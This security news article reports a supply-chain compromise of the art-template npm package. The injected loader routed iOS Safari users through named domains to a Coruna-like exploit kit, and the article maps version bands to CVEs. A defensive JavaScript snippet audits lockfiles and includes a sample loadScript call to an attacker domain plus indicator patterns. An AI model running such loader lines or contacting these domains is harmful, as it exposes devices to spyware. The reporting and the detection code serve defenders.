Compromised art-template npm Package Delivers Coruna-Like iOS Exploit
- Supply Chain Attack: Compromised art-template package versions injected malicious loaders into web environments.
- Exploit Kit Delivery: The payload targets iOS Safari users via sophisticated watering-hole tactics.
- Malicious Domain Routing: The campaign utilizes domains like v3.jiathis.com to deliver the framework.
A highly sophisticated compromise of art-template, a widely used JavaScript templating library originally authored by a developer known as aui, turned the package into a supply chain attack vector that delivered a Coruna-like iOS Safari exploit framework through a watering-hole attack.
Socket Threat Research detected the compromise on May 20, 2026. The threat actor systematically escalated the attack across multiple iterations of the open-source library.
Malicious Injection Mechanics
In version 4.13.3, the attackers utilized String.fromCharCode obfuscation to conceal the malicious payload. However, in subsequent versions 4.13.5 and 4.13.6, the attackers abandoned this obfuscation entirely. They opted instead for plaintext loadScript calls that injected a browser-side remote-script loader directly into the lib/template-web.js file.
This targeted injection initiated a precise redirect chain utilizing the domains v3.jiathis.com and utaq.cfww.shop, ultimately connecting victims to a command-and-control server hosted at l1ewsu3yjkqeroy[.]xyz.
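For defenders checking their own exposure, the following added example (not code from Socket or from the art-template project) audits a parsed package-lock.json for the three versions named above and scans file contents such as lib/template-web.js for the indicators this article lists. The function names and sample inputs are constructed for illustration, and the loadScript and String.fromCharCode patterns are heuristics that need manual review on a hit.

```javascript
// Versions the article names as compromised.
const BAD_VERSIONS = new Set(["4.13.3", "4.13.5", "4.13.6"]);
// Indicators taken from the article; the last two are heuristics, not proof.
const INDICATORS = [
  { name: "domain v3.jiathis.com", re: /v3\.jiathis\.com/i },
  { name: "domain utaq.cfww.shop", re: /utaq\.cfww\.shop/i },
  { name: "domain l1ewsu3yjkqeroy.xyz", re: /l1ewsu3yjkqeroy\.xyz/i },
  { name: "loadScript call", re: /\bloadScript\s*\(/ },
  { name: "String.fromCharCode run", re: /String\.fromCharCode\s*\((?:\s*\d+\s*,){8,}/ },
];

// Accepts a parsed package-lock.json: v2/v3 "packages" map or v1 "dependencies" tree.
function auditLockfile(lock) {
  const hits = [];
  for (const [path, meta] of Object.entries(lock.packages || {})) {
    if (/(^|\/)node_modules\/art-template$/.test(path) && BAD_VERSIONS.has(meta.version)) {
      hits.push({ path, version: meta.version });
    }
  }
  const walk = (deps, trail) => {
    for (const [name, meta] of Object.entries(deps || {})) {
      const path = `${trail}node_modules/${name}`;
      if (name === "art-template" && BAD_VERSIONS.has(meta.version)) hits.push({ path, version: meta.version });
      walk(meta.dependencies, `${path}/`); // nested (transitive) copies
    }
  };
  if (!lock.packages) walk(lock.dependencies, ""); // v2 carries both maps; avoid double counting
  return hits;
}

// Returns the names of every indicator found in the given file contents.
function scanSource(text) {
  return INDICATORS.filter((i) => i.re.test(text)).map((i) => i.name);
}

// Constructed sample inputs (not taken from a real project or from the malicious package).
const SAMPLE_LOCK = {
  lockfileVersion: 3,
  packages: {
    "": { name: "demo-app" },
    "node_modules/art-template": { version: "4.13.2" },
    "node_modules/some-cms/node_modules/art-template": { version: "4.13.5" },
  },
};
const SAMPLE_SOURCE = 'loadScript("//v3.jiathis.com/PLACEHOLDER");';
console.log(auditLockfile(SAMPLE_LOCK), scanSource(SAMPLE_SOURCE));
```

Because the injected loader runs in the browser, the same scan is worth running over built bundles and any self-hosted or CDN copies of template-web.js, not only over node_modules.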
The resulting implant functions as a highly specialized exploit delivery mechanism. It exclusively targets users running Safari on iOS versions 11.0 through iOS 17.2. The malicious framework explicitly rejects all other operating systems, desktop environments, and alternative browsers, according to Socket.
Furthermore, the framework implements a hard cutoff that immediately terminates execution on iOS 17.3 and above, preventing deployment on patched systems.
Vulnerable iOS devices targeted:
- iOS 11.0 – 15.1 — mmrZ0r flag path
- iOS 15.2 – 15.5 — RbKS6p flag path
- iOS 15.6 – 16.1 — ShQCsB flag path
- iOS 16.2 – 16.5 — KeCRDQ flag path
- iOS 16.6 – 17.1 — JtEUci flag path
- iOS 17.2 — JtEUci + wC3yaB; hardened WASM-verified path
- macOS Safari — partial; desktop WebKit path exists, fingerprinting differs
Coruna-Like iOS Safari Exploitation
Following their extensive technical analysis, Socket assessed with high confidence that this malicious sample represents the established Coruna exploit kit delivery framework or a very close derivative. Coruna contains 5 full exploit chains and 23 individual exploits, targeting iOS 13.0 through 17.2.1.
“Coruna defines five WebContent RCE exploit chains, each covering a specific iOS version band,” the report said. The sample's five version-specific payload modules map to these chains with near-perfect alignment:
- iOS 11.0–15.1 (mmrZ0r) — Coruna buffout (CVE-2021-30952, fixed 15.2) and jacurutu (CVE-2022-48503, fixed 15.6)
- iOS 15.6–16.1 (ShQCsB) — Coruna bluebird (no CVE, fixed 16.2)
- iOS 16.2–16.5 (KeCRDQ) — Coruna terrorbird (CVE-2023-43000, fixed 16.6)
- iOS 16.6–17.2 (JtEUci) — Coruna cassowary (CVE-2024-23222, fixed 17.3)
- iOS 17.3+ — hard exit 1001 in our sample; cassowary patched at exactly this boundary
In March, Trenchant, the offensive cyber operations division of U.S. defense contractor L3Harris, was linked to the global iPhone hacking toolkit Coruna, which GTIG estimated is currently used by multiple, unrelated threat actors.
Later the same month, a newer version of the DarkSword iPhone exploit kit leaked on GitHub, exposing iOS users to spyware.







